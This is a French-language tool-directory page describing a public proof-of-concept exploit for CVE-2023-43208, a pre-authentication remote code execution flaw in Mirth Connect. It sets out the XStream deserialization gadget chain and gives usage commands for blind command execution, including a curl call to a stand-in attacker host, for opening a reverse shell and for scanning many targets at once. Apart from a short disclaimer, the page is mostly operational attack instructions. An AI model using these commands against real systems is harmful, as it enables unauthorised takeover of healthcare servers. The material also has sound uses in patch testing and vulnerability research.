Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-43208 — CVE-2023-43208: Mirth Connect Pré-authentification RCE PoC | Kitploit
Outils/GitHubGitHub/kyakei/cve-2023-43208
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingDéveloppement de Charges Utiles
GitHubkyakei/cve-2023-43208

CVE-2023-43208

CVE-2023-43208: Mirth Connect Pré-authentification RCE PoC

Voir le dépôt
31il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-43208 — RCE sans authentification préalable sur Mirth Connect

Exécution de code à distance sans authentification préalable dans NextGen Healthcare Mirth Connect < 4.4.1 via un contournement de désérialisation XStream.

CVSS 9.8 (Critique) — Contournement du correctif de CVE-2023-37679

Aperçu

Mirth Connect utilise la bibliothèque Java XStream pour désérialiser les charges utiles XML sur le point de terminaison /api/users sans authentification. Le correctif initial (CVE-2023-37679) a introduit une liste noire de classes dangereuses, mais cela a été contourné en utilisant EventBindingInvocationHandler d'Apache Commons Lang3 combiné avec la chaîne InvokerTransformer de Commons Collections4.

Corrigé dans Mirth Connect 4.4.1 en passant d'une liste noire à une liste blanche.

Prérequis

root@kitploit:~
pip install requests

Python 3.10+ (utilise les instructions match).

Utilisation

Vérifier si une cible est vulnérable

root@kitploit:~
python3 exploit.py check -t https://target:8443

Exécuter une commande (RCE aveugle — pas de sortie)

root@kitploit:~
python3 exploit.py exec -t https://target:8443 -c "id"
python3 exploit.py exec -t https://target:8443 -c "curl http://attacker/pwned"

Obtenir un shell inversé

root@kitploit:~
# Terminal 1 (or let the script handle the listener):
python3 exploit.py shell -t https://target:8443 --lhost 10.10.10.10 --lport 4444

# For better shell experience, use rlwrap:
rlwrap python3 exploit.py shell -t https://target:8443 --lhost 10.10.10.10 --lport 4444

Scanner plusieurs cibles

root@kitploit:~
python3 exploit.py scan -f targets.txt -o vulnerable.txt -T 30

Chaîne d'attaque

root@kitploit:~
POST /api/users  (no auth)
     │
     ▼
XStream deserializes XML payload
     │
     ▼
sorted-set triggers Comparable.compareTo()
     │
     ▼
dynamic-proxy → EventBindingInvocationHandler (bypasses denylist)
     │
     ▼
ChainedTransformer.transform()
     │
     ▼
ConstantTransformer(Runtime.class)
  → InvokerTransformer("getRuntime")
    → InvokerTransformer("invoke")
      → InvokerTransformer("exec", <command>)
           │
           ▼
      OS command execution as Mirth Connect service user

Avertissement

Cet outil est fourni uniquement à des fins de test de sécurité autorisé et de formation. L'accès non autorisé à des systèmes informatiques est illégal. Obtenez toujours une autorisation appropriée avant de tester.

Références

  • NVD — CVE-2023-43208
  • Horizon3.ai — Analyse
  • Catalogue KEV de la CISA
Télécharger l’outil